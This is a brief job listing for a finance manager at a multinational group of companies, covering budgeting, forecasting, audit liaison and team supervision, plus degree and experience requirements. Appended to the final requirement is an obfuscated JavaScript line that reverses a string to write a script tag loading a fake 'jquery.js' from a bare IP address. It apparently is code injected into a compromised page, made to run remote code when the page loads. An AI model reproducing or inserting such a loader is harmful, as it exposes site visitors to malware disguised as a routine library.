Industry : Multinational Group of Companies
– Overall financial management, budget control, cash flow, forecast, tax planning, etc.
– Analyse and interpret financial data to provide management information on cost allocation and controls, comparison of results against budgets, income and expenditure analysis, etc.
– Make financial forecasts and advises senior management on the financial implications of proposed acquisitions, divestments, etc.
– Work closely with external auditors on audit/accounting issues to ensure compliance with all accounting, tax, legislative and regulative requirements.
– Supervise accounts department, lead and manage team efficiently and effectively.
– Candidate must possess at least a Bachelor’s Degree, Post Graduate Diploma, Professional Degree, Finance/Accountancy/Banking or equivalent.
– At least 5 year(s) of working experience in the related field is required for this position.
– Preferably Managers specializing in Finance – General/Cost Accounting or equivalent. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))